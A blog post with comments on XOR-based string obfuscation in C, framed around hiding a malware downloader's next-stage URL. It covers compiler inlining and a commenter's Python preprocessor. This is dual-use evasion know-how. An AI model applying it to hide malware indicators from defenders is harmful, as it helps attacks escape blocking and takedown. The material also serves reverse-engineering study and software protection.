DIY String obfuscation for plain C



Say you want to write a C program but avoid including plain strings in the binary. This is called string obfuscation. Malware authors often do this, for example, to prevent easy extraction of so-called indicators of compromise. I can also imagine a legitimate business using string obfuscation to protect its intellectual property by making its software harder to reverse engineer.

Motivation

Let's stay with malware as an example use case for string obfuscation and consider a simple downloader, i.e. malware whose sole purpose is to download something from the Internet (the so-called next stage) and execute it on the targeted system. Let's further assume that the downloader uses HTTP. This is a common choice for malware authors, probably because it blends nicely into legitimate network traffic and is easy to use: the Windows API supports HTTP natively, and setting up an HTTP server is easy as pie. Since the downloader needs to know what to download, the URL of the next stage has to be contained in the downloader somehow. If the URL is included as a plain string in the binary, calling strings malware.exe | grep http is a very easy way to "extract" it. But the author (or, to be more precise, the operator of the malware) has an interest in making the URL harder to extract: if I, as a defender, can extract the next-stage URL that easily, I can just block the URL (or even the domain) from resolving in my network and hence make the malware ineffective. Depending on where the next stage is hosted, it may even be possible to notify the hoster of the malicious activity and get the URL or domain taken down.

The Naïve Approach

The most obvious approach to achieve this goal is to replace every string in the source code with a call to a function that returns the actual string. So
download("http://example.com/next-stage.exe")
would become something like
download(deobfuscate("mambojumbo123", "more arguments if needed", 123))
Doing this by hand is annoying, time-consuming and error-prone. So let's automate this step, i.e. call some sort of pre-processor that takes the original source code as input and outputs source code with all strings replaced by calls to the deobfuscate function. But there is a problem with this approach: the original source code used a constant string, which does not need to be freed explicitly, whereas the deobfuscate function allocates new memory on the heap to hold the deobfuscated string. Since nothing frees that memory, the program starts to leak, which is unacceptable!

Don't Leak

To avoid memory leakage, we want to somehow establish a contract with the user of this obfuscation technique, such that "protected strings" are freed after use. Let's re-implement strdup but give it a different name:
char *protect(const char *s) {
    char *ret = malloc(sizeof(char) * (strlen(s) + 1));
    if (ret == NULL) return NULL;
    strcpy(ret, s);
    return ret;
} 
The function accepts a string as its only argument, allocates enough memory to store a copy of it and returns a pointer to this memory. The contract with the author of the C code is now that every string that should be obfuscated needs to be passed to the protect function. Because protect returns heap memory, this forces the developer to free the string after use:
char *s = protect("http://example.com/next-stage.exe");
if (s != NULL) {
    download(s);
    free(s);
}
This also makes pattern matching for strings much easier: we can just search with a regex like this
protect\("([^"]+?)"\)
and replace it with calls to deobfuscate.

Concrete Obfuscation

Up to this point, we haven't talked about a concrete implementation of the obfuscation. For starters, we will take something simple: generate a random byte array (a key) for every string to be protected, and have deobfuscate XOR the obfuscated string with the key to get the original string back:
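char *deobfuscate(const char *buffer, int len, const char *key, int key_len) {
    char *ret = malloc(sizeof(char) * (len + 1));
    if (ret == NULL) return NULL;  /* do not write through a failed allocation */
    ret[len] = '\0';
    /* XOR every byte with the repeating key */
    for (int i = 0; i < len; i++) {
        ret[i] = buffer[i] ^ key[i % key_len];
    }
    return ret;
}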
So instead of protect("example.com"), the source code that gets compiled will contain something like this:
deobfuscate("\x3a\xe1\x08\x12\x60\xd0\x6f\x71\xfa\x06\x12", 11, "\x5f\x99\x69\x7f\x10\xbc\x0a", 7);
The original source code will only contain calls to protect and none to deobfuscate, whereas the pre-processed source code with obfuscated strings will only contain calls to deobfuscate and none to protect. Implementing such a pre-processing script is left as an exercise to the reader.
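
As a starting point for that exercise, the build-time half can be sketched in a few lines of C. This is only an illustration, not the script used for this post: the helper names xor_with_key and format_c_escapes are made up here, and the key is passed in rather than generated randomly so that the result can be compared with the example above.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: XOR `len` bytes of `in` with a repeating key into `out`.
 * Applying it twice with the same key yields the original bytes again. */
void xor_with_key(const unsigned char *in, size_t len,
                  const unsigned char *key, size_t key_len,
                  unsigned char *out) {
    for (size_t i = 0; i < len; i++) {
        out[i] = in[i] ^ key[i % key_len];
    }
}

/* Hypothetical helper: render bytes as C hex escapes such as \x3a\xe1.
 * `out` must have room for 4 * len + 1 characters. */
void format_c_escapes(const unsigned char *data, size_t len, char *out) {
    for (size_t i = 0; i < len; i++) {
        /* each byte becomes exactly four characters: backslash, x, two digits */
        sprintf(out + 4 * i, "\\x%02x", (unsigned int)data[i]);
    }
    out[4 * len] = '\0';
}
```

Feeding "example.com" and the key 5f 99 69 7f 10 bc 0a through these two helpers gives the escape sequence used in the deobfuscate call above. Every byte is written as an escape on purpose: a hex escape in a C string literal swallows all hex digits that follow it, so mixing escapes with plain characters could change the meaning of the literal.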

The Twist

I felt pretty confident with this second approach, compiled the source code with all interesting strings obfuscated and called strings on the resulting executable. To my surprise, it still contained the next-stage URL, or at least fragments of it. To understand what had happened, I launched Ghidra (the reverse engineering tool developed by the NSA and released as open source a few months ago; this is a big deal because it basically democratized the reverse engineering community ... but I digress) and threw the binary into it. The place where there should have been a call to deobfuscate just led to the following decompiled code:
BYTE *Memory = malloc(0xc);
if (Memory != NULL) {
    *(Memory + 8) = 0x6d6f63;
    *Memory = 0x2e656c706d617865;
    /* ... */
}
There is no call to deobfuscate but merely a call to malloc. And where do these hexadecimal numbers come from? Taking endianness into account, the two assignments result in an array with the following content:
{0x65, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x00, 0x00, 0x00, 0x00}
which is equivalent to the string example.com. And while it was harder to extract the string from the binary, this is not the intended result! What happened? You might already have guessed that the deobfuscate function was inlined by the compiler as a performance optimization. This explains why the call to deobfuscate is gone while the call to malloc from within the function is still there. The compiler also figured out that the for loop only depends on values that are constant at compile time, which makes it possible to execute the loop at compile time and just generate code that assigns the resulting content to the array.
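
The byte order argument can be checked with a small sketch. It emulates the two little-endian stores from the decompiled code byte by byte, so it behaves the same on any host. The helper names store_le and rebuild_buffer are made up for this illustration, and the second store is assumed to be 32 bits wide, which would match the 12-byte allocation.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: write the lowest `width` bytes of `value` to `dst`,
 * least significant byte first, like a little-endian store would. */
void store_le(unsigned char *dst, uint64_t value, size_t width) {
    for (size_t i = 0; i < width; i++) {
        dst[i] = (unsigned char)(value >> (8 * i));
    }
}

/* Replays the two assignments from the decompiled code on a 12-byte buffer. */
void rebuild_buffer(unsigned char out[12]) {
    store_le(out + 8, 0x6d6f63, 4);              /* *(Memory + 8) = 0x6d6f63 (assumed 32-bit) */
    store_le(out, 0x2e656c706d617865ULL, 8);     /* *Memory = 0x2e656c706d617865 */
}
```

After rebuild_buffer(buf), the bytes in buf spell "example.com" followed by the terminating zero byte.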

The Solution

Disabling -O3 optimization was not an option for me. I talked with tobi about this and he suggested a very simple solution: the compiler is only able to inline the deobfuscate function because it knows at compile time how deobfuscate is defined. Placing the function into a separate module, which is a good idea anyway to make code reuse easier, avoids the above-described optimization because the definition of deobfuscate only becomes available at link time, which is too late for compile-time optimizations (as long as link-time optimization is not enabled). The result is a binary that does not contain the string in plain text anymore! Great success.
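
A minimal sketch of such a module could look like this. The file names deobfuscate.c and deobfuscate.h are assumptions, as is the exact signature, which simply follows the function shown earlier.

```c
/* deobfuscate.c (hypothetical file name): compiled on its own, so the
 * compiler does not see this definition while it optimizes the callers.
 *
 * A matching header, deobfuscate.h, would only carry the prototype:
 *   char *deobfuscate(const char *buffer, int len, const char *key, int key_len);
 */
#include <stdlib.h>

char *deobfuscate(const char *buffer, int len, const char *key, int key_len) {
    char *ret = malloc((size_t)len + 1);
    if (ret == NULL) return NULL;
    /* XOR every byte with the repeating key; the caller frees the result */
    for (int i = 0; i < len; i++) {
        ret[i] = buffer[i] ^ key[i % key_len];
    }
    ret[len] = '\0';
    return ret;
}
```

Built with something like cc -O3 -c deobfuscate.c followed by cc -O3 main.c deobfuscate.o (main.c being a stand-in for the rest of the program), the callers only ever see the prototype.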

3 Replies to “DIY String obfuscation for plain C”

  1. There are some other options. Turn off optimization for a certain part of the code. For GCC:
    #pragma GCC push_options
    #pragma GCC optimize ("O0")
    void foo(void) {}
    #pragma GCC pop_options
    
    For MSVC:
    #pragma optimize( "", off )
    void foo(void) {}
    #pragma optimize( "", on ) 
    
    Do not inline. For GCC:
    void __attribute__ ((noinline)) foo() {}
    
    For MSVC:
    __declspec(noinline)
    void foo(void) {}
    
  2. use it: python3 script.py code.c
    import re
    import binascii
    import itertools
    import sys, getopt
    
    def byte_xor(ba1, ba2):
        return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])
    
    def encode_plaintext(plaintext):
        one_time_pad = bytes([0x01, 0x0c, 0x1e]) # put here your key 
        one_time_pad *= 100 # should exceed any string in your C code
        ciphertext = byte_xor(bytes(plaintext, 'ascii'), one_time_pad)
        return ciphertext
    
    def main(argv):
        p = re.compile(r'protect\("(.+?)"\)')  # slightly fixed
    
        for filepath in argv:   
            with open(filepath, 'r+') as content_file:
                content = content_file.read()
    
            # flags belong in re.compile(); a second argument here would be a start offset
            matches = p.finditer(content)
    
            for matchNum, match in enumerate(matches, start=1):
                print("Match {matchNum} was found at {start}-{end}: {match}".format(matchNum = matchNum, start = match.start(), end = match.end(), match = match.group()))
    
                for groupNum in range(0, len(match.groups())):
                    groupNum = groupNum + 1
                    
                    plaintext = match.group(groupNum)
                    # print("Group {groupNum} found at {start}-{end}: {group}".format(groupNum = groupNum, start = match.start(groupNum), end = match.end(groupNum), group = plaintext))
    
                    encoded_bytes = encode_plaintext(plaintext)
                    # emits a two-argument deobfuscate(buffer, len); the key is assumed to be hard-coded on the C side
                    formated_str = 'deobfuscate("' + "".join("\\x{:02x}".format(encoded_byte) for encoded_byte in encoded_bytes) + '", ' + str(len(encoded_bytes)) + ")"
    
                    print(plaintext, ":encoded to:", formated_str)
                    content = content.replace(match.group(), formated_str)
            # print(content)
    
            f = open(filepath, "w")
            f.write(content)
            f.close()
            pass
        return 0
    
    if __name__ == "__main__":
        main(sys.argv[1:])
    
